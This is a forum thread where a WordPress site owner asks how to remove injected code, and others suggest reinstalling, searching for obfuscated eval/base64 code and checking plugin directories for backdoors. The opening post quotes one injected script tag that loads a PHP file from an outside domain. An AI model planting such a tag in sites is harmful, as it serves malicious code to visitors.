On of my blog running on Wordpress had strange URLs like <script src=http://thalassapromotion.eu/scripts/pageear_s.php ></script> in it. I deleted the codes from the files,but still i find the above code in the source code of my site. I think it has not been completely removed.Does anyone know how to remove it completely. Also,I dont want to remove all the files on the server,since i dont know where i got the theme ,currently im using on the site
I'd suggest backing up the wordpress database, removing all files, installing the latest wordpress and restoring the database. Another way is to search files for "thalassapromotion.eu" and remove the tags. Sometimes those hackers base64 encode the strings, so you have to look for code containting eval + base64_encode and remove it.
Yah,i removed all the eval,base 64_encode from files...But it seems there is somemore hidden among various other files
Check the plugins dir, I remember when I once got hacked via old wordpress, they hid a backdoor in plugins dir, that would re-install itself. It was located in 'js' directory there somewhere. Like /path/to/wordpress/wp-content/plugins/some-plugin/js/files.js.php. I didn't realize at first that 'js' was not part of that plugin.
pm me your domain name and I'll see what I can come up with. Also, if it happens on a certain page, that would be helpful.